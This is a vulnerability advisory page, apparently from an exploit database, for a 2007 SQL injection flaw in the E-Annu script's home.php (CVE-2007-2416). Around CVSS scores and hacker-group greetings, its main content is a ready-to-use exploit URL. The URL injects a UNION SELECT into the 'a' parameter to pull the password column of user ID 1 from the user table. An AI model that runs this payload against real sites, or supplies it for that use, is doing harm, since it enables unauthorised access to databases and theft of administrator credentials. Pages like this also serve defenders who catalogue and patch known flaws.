E-Annu (home.php) Remote SQL Injection Vulnerability

2007.05.02

Credit: ilker kandemir

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2007-2416

CWE: CWE-89

CVSS Base Score: 7.5/10

Impact Subscore: 6.4/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

-------------------------------------------------AYYILDIZ.ORG PreSents...
Script: E-Annu
Script D.: http://www.alic.ch/sources/annu.rar
Script Demo: http://www.autocash.ch/annu/
Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>
info: */ Siz Yokken AYYILDIZ Vardi. */
-------------------------------------------------Exploit:
home.php?a='/**/UNION/**/SELECT/**/0,password,1,2,3,4,6/**/FROM/**/user/
**/WHERE/**/user_id=1/*
-------------------------------------------------
Reklam yeri: Turkistiklal.com
-------------------------------------------------
Tnx:H0tturk,Dr.Max Virus,Gencnesil,X-Hacker,Ajann
Special Tnx: AYYILDIZ.ORG

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

E-Annu (home.php) Remote SQL Injection Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.